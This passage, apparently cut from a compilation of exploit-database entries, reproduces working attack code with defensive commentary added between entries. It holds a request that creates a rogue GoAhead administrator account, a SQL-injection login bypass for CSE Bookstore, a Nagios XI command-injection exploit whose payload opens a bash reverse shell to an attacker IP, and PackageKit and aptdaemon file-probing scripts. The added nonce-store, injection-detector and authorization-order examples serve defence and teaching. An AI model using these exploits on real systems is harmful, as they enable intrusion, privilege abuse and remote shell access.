data = {"FormSubmitCause": "button",
        "DefinitionAction": "add",
        "Define_admin_ID": "admin",
        "Define_admin_Name": "admin",
        "Define________Action________ID": '',
        "Define________Action________Name": "testingus",
        "Define________Action________Password": "testingus",
        "Define________Action________Group": "Administrators"}

requests.post(url, headers=headers, cookies=kolache, data=data)
print("Finito")
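The PoC works because a captured Authorization header stays valid for the whole nonce lifetime and the server does not notice that the same nonce and nc pair is being presented again. GoAhead's own fix is in the commits linked above; the following is an added example, not GoAhead code, of the two server-side rules that close the window: nonces are stamped with their issue time under an HMAC and expire after a short lifetime, and the nc counter must strictly increase for each nonce, so a verbatim replay is refused even inside the lifetime. The clock is injectable so the expiry can be exercised; the secret, realm, user and lifetime values are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import time


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 response for qop=auth, as the client computes it."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


class NonceStore:
    """Server-side nonce policy: nonces are HMAC-stamped with their issue time,
    expire after `lifetime` seconds, and nc must strictly increase per nonce,
    so a captured Authorization header cannot simply be resent."""

    def __init__(self, secret, lifetime=30, now=time.time):
        self.secret = secret
        self.lifetime = lifetime
        self.now = now            # injectable clock (tests pass a fake one)
        self.highest_nc = {}      # nonce -> last nc accepted

    def _mac(self, ts, rand):
        return hmac.new(self.secret, f"{ts}:{rand}".encode(), hashlib.sha256).hexdigest()[:32]

    def issue(self):
        ts, rand = int(self.now()), os.urandom(8).hex()
        return f"{ts}:{rand}:{self._mac(ts, rand)}"

    def check(self, nonce, nc, commit=False):
        """Return (ok, reason). With commit=True the nc is recorded as used."""
        try:
            ts_s, rand, mac = nonce.split(":")
            ts, count = int(ts_s), int(nc, 16)
        except ValueError:
            return False, "malformed"
        if not hmac.compare_digest(mac, self._mac(ts, rand)):
            return False, "forged"          # not one of ours: no state is consulted
        if self.now() - ts > self.lifetime:
            self.highest_nc.pop(nonce, None)
            return False, "stale"
        if count <= self.highest_nc.get(nonce, 0):
            return False, "replayed"        # same or lower nc seen for this nonce
        if commit:
            self.highest_nc[nonce] = count
        return True, "ok"


def authenticate(store, users, params, method):
    """Verify one parsed Digest Authorization header against the user table.
    The nc is only committed after the response proves knowledge of the
    password, so a wrong guess cannot burn counters for the real client."""
    ok, why = store.check(params["nonce"], params["nc"])
    if not ok:
        return False, why
    password = users.get(params["username"])
    if password is None:
        return False, "unknown user"
    expected = digest_response(params["username"], params["realm"], password, method,
                               params["uri"], params["nonce"], params["nc"],
                               params["cnonce"], params.get("qop", "auth"))
    if not hmac.compare_digest(expected, params["response"]):
        return False, "bad credentials"
    store.check(params["nonce"], params["nc"], commit=True)
    return True, "ok"
```

Digest over plain HTTP still leaks the MD5 material to anyone on the path, so the nonce policy limits replay; it does not replace TLS, which the advisory names as the condition under which the attack applies.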
  22. # Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909

CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel. By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.

Payload:
Name: admin
Pass: %' or '1'='1

Sample BurpSuite intercept:

POST /bookstore/admin_verify.php HTTP/1.1
Host: 192.168.20.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://192.168.20.131
Connection: close
Referer: http://192.168.20.131/bookstore/admin.php
Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv
Upgrade-Insecure-Requests: 1

name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query
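Entries 19 and 22 are the same tautology injection in two PHP applications, visible in the request body as a quote or wildcard followed by `or` and an always-true comparison. The following added example (my code, not from either report) decodes POST bodies the way the application would and flags parameters carrying that pattern, a `UNION ... SELECT`, or a quote followed by a comment marker, which is the shape a WAF rule or a log-review script would look for. The request bodies are constructed from the two requests quoted above plus a benign search; the regular expressions are heuristics for alerting and do not replace prepared statements in the application.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed samples: the two request bodies quoted in entries 19 and 22,
# plus a benign search for comparison.
SAMPLE_BODIES = {
    "POST /clientms/client/search-invoices.php": "searchdata=1%27+or+1%3D1%23&search=",
    "POST /bookstore/admin_verify.php": "name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query",
    "POST /clientms/client/search-invoices.php (benign)": "searchdata=INV-2020-001&search=",
}

# Quote, wildcard or closing paren, then a boolean operator, then a comparison
# such as 1=1 or '1'='1.
TAUTOLOGY = re.compile(r"""['"%)]\s*(?:or|and)\s+'?\w+'?\s*(?:=|like)\s*'?\w+'?""", re.I)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+\bselect\b", re.I)
COMMENT_TAIL = re.compile(r"(?:--|#|/\*)")


def suspicious_params(body):
    """Return [(param, decoded_value, [reasons])] for each parameter that looks
    like an injection attempt; an empty list means nothing matched."""
    hits = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        v = unquote_plus(value)   # second decode catches double-encoded payloads (%2527)
        reasons = []
        if TAUTOLOGY.search(v):
            reasons.append("tautology")
        if UNION_SELECT.search(v):
            reasons.append("union-select")
        if ("'" in v or '"' in v) and COMMENT_TAIL.search(v):
            reasons.append("quote+comment")
        if reasons:
            hits.append((key, v, reasons))
    return hits


def scan(bodies):
    """Map each request to its suspicious parameters."""
    return {req: suspicious_params(body) for req, body in bodies.items()}


if __name__ == "__main__":
    for req, hits in scan(SAMPLE_BODIES).items():
        for key, value, reasons in hits:
            print(f"{req}: {key}={value!r} {reasons}")
```

Decoding before matching matters: the raw body `%25%27+or+%271%27%3D%271` contains no quote character at all, so a rule applied to the undecoded form misses it.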
  23. # Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
# Date: 10-27-2020
# Vulnerability Discovery: Chris Lyne
# Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-5791

#!/usr/bin/python3

import re
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Credit: Chris Lyne for vulnerability discovery and original PoC

if len(sys.argv) != 6:
    print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port")
    exit()

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]

login_url = host + "/nagiosxi/login.php"

payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)


def exploit():
    s = requests.Session()
    login_page = s.get(login_url)
    nsp = re.findall('var nsp_str = "(.*?)"', login_page.text)
    res = s.post(
        login_url,
        data={
            'nsp': nsp,
            'page': 'auth',
            'debug': '',
            'pageopt': 'login',
            'redirect': '/nagiosxi/index.php?',
            'username': username,
            'password': password,
            'loginButton': ''
        },
        verify=False,
        allow_redirects=True
    )
    injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload)
    res = s.get(injection_url)
    if res.status_code != 200:
        print("[~] Failed to connect")


if __name__ == '__main__':
    exploit()
  24. # Exploit Title: File Existence Disclosure in PackageKit < 1.1.13-2ubuntu1
# Date: 2020-10-27
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://www.freedesktop.org/software/PackageKit/
# Software Link: https://www.freedesktop.org/software/PackageKit/
# Version: <= 1.1.1+bzr982-0ubuntu32.1
# Tested on: Ubuntu 20.04
#

#!/usr/bin/env python3
#
# Ubuntu 16.04 - 20.04
# PackageKit <= 1.1.13-2ubuntu1
# Sensitive Information Disclosure
#
#
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
# The InstallFiles, GetFilesLocal and GetDetailsLocal methods
# of the d-bus interface to PackageKit access given files
# before checking for authorization. This allows non-privileged
# users to learn the MIME type of any file on the system.
#
# Example in attached Python script:
#
# $ python3 test_file_exists_pk.py /root/.bashrc
# File exists and is of MIME type: 'text/plain'
#
# $ python3 test_file_exists_pk.py /root/.bashrca
# File does not exist
#
#

import dbus
import os
import sys
import re

if len(sys.argv) != 2:
    print("Checks if file exists and returns MIME type")
    print("Usage: %s <file>" % sys.argv[0])
    sys.exit(0)

FILE_TO_CHECK = sys.argv[1]

bus = dbus.SystemBus()
apt_dbus_object = bus.get_object("org.freedesktop.PackageKit", "/org/freedesktop/PackageKit")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.freedesktop.PackageKit")
trans = apt_dbus_interface.CreateTransaction()
apt_trans_dbus_object = bus.get_object("org.freedesktop.PackageKit", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.freedesktop.PackageKit.Transaction")

try:
    apt_trans_dbus_interface.InstallFiles(0, [FILE_TO_CHECK])
    # ALSO apt_trans_dbus_interface.GetFilesLocal([FILE_TO_CHECK])
    # ALSO apt_trans_dbus_interface.GetDetailsLocal([FILE_TO_CHECK])
except dbus.exceptions.DBusException as e:
    if "No such file" in str(e):
        print("File does not exist")
    elif "MimeTypeNotSupported" in str(e):
        result = re.search('MIME type (.*) not supported', str(e))
        print("File exists and is of MIME type: " + result.group(1))
  25. # Exploit Title: File Existence Disclosure in aptdaemon <= 1.1.1+bzr982-0ubuntu32.1
# Date: 2020-10-27
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://wiki.debian.org/aptdaemon
# Software Link: https://wiki.debian.org/aptdaemon
# Version: <= 1.1.1+bzr982-0ubuntu32.1
# Tested on: Ubuntu 20.04
#

#!/usr/bin/env python3
#
# Ubuntu 16.04 - 20.04
# Debian 9 - 11
# aptdaemon < 1.1.1+bzr982-0ubuntu32.1
# Sensitive Information Disclosure
#
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
# There is no input validation on the Locale property in an
# apt transaction. An unprivileged user can supply a full path
# to a writable directory, which lets aptd read a file as root.
# Having a symlink in place results in an error message if the
# file exists, and no error otherwise. This way an unprivileged
# user can check for the existence of any files on the system
# as root.
#
# This is a similar type of bug as CVE-2015-1323.
#
#
# $ ./test_file_exists.py /root/.bashrc
# File Exists!
# $ ./test_file_exists.py /root/.bashrca
# File does not exist!
#
#

import dbus
import os
import sys

if len(sys.argv) != 2:
    print("Checks if file exists")
    print("Usage: %s <file>" % sys.argv[0])
    sys.exit(0)

FILE_TO_CHECK = sys.argv[1]

bus = dbus.SystemBus()
apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt")

# just use any valid .deb file
trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb", False)

apt_trans_dbus_object = bus.get_object("org.debian.apt", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction")
properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties')

os.mkdir("/tmp/a")
os.mkdir("/tmp/a/LC_MESSAGES")
os.symlink(FILE_TO_CHECK, "/tmp/a/LC_MESSAGES/aptdaemon.mo")

try:
    properties_manager.Set("org.debian.apt.transaction", "Locale", "/tmp/a.")
except:
    print("File Exists!")
    pass
else:
    print("File does not exist!")

os.unlink("/tmp/a/LC_MESSAGES/aptdaemon.mo")
os.rmdir("/tmp/a/LC_MESSAGES")
os.rmdir("/tmp/a")
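Entries 24 and 25 describe the same defect in two privileged D-Bus daemons: a caller-supplied path is examined before the caller's authorization is checked, so the error message an unprivileged caller gets back depends on whether the file exists. The following added example (not PackageKit or aptdaemon code) puts the two orderings side by side with a stand-in for the polkit check; the `authorized()` function, the action name and the uid-based caller records are constructed for the demonstration. It shows what an unprivileged probe can tell apart in each case, which is the property a fix should be tested against.

```python
import os
import tempfile


class NotAuthorized(Exception):
    pass


def authorized(caller, action):
    """Stand-in for the polkit CheckAuthorization call a real daemon makes
    (assumption: a caller record carries a uid and a set of granted actions)."""
    return caller.get("uid") == 0 or action in caller.get("grants", ())


def install_files_leaky(caller, paths):
    """The ordering the two advisories describe: the file is examined before
    the caller's authorization, so an unprivileged caller receives a different
    error depending on whether the path exists."""
    for p in paths:
        if not os.path.lexists(p):
            raise FileNotFoundError(f"No such file or directory: {p}")
    if not authorized(caller, "org.example.packagekit.install-file"):
        raise NotAuthorized("not authorized")
    return "installed"


def install_files_fixed(caller, paths):
    """Authorize first. Until the caller is allowed to act, nothing about the
    path is inspected and every refusal looks the same."""
    if not authorized(caller, "org.example.packagekit.install-file"):
        raise NotAuthorized("not authorized")
    for p in paths:
        if not os.path.lexists(p):
            raise FileNotFoundError(f"No such file or directory: {p}")
    return "installed"


def probe(handler, caller, path):
    """What one request teaches the caller: 'ok', 'missing' or 'denied'."""
    try:
        handler(caller, [path])
        return "ok"
    except FileNotFoundError:
        return "missing"
    except NotAuthorized:
        return "denied"


def demo():
    """Probe an existing and a missing path as an unprivileged caller."""
    unpriv = {"uid": 1000, "grants": ()}
    with tempfile.TemporaryDirectory() as d:
        present = os.path.join(d, "present.deb")
        open(present, "wb").close()
        missing = os.path.join(d, "missing.deb")
        return {
            "leaky": (probe(install_files_leaky, unpriv, present),
                      probe(install_files_leaky, unpriv, missing)),
            "fixed": (probe(install_files_fixed, unpriv, present),
                      probe(install_files_fixed, unpriv, missing)),
        }


if __name__ == "__main__":
    for variant, (existing, absent) in demo().items():
        print(f"{variant}: existing file -> {existing}, missing file -> {absent}")
```

The aptdaemon variant adds a second lesson: the Locale property is effectively a path under the caller's control that the daemon resolves as root, so even after the authorization check the daemon should reject values containing path separators and open files it derives from user input with O_NOFOLLOW.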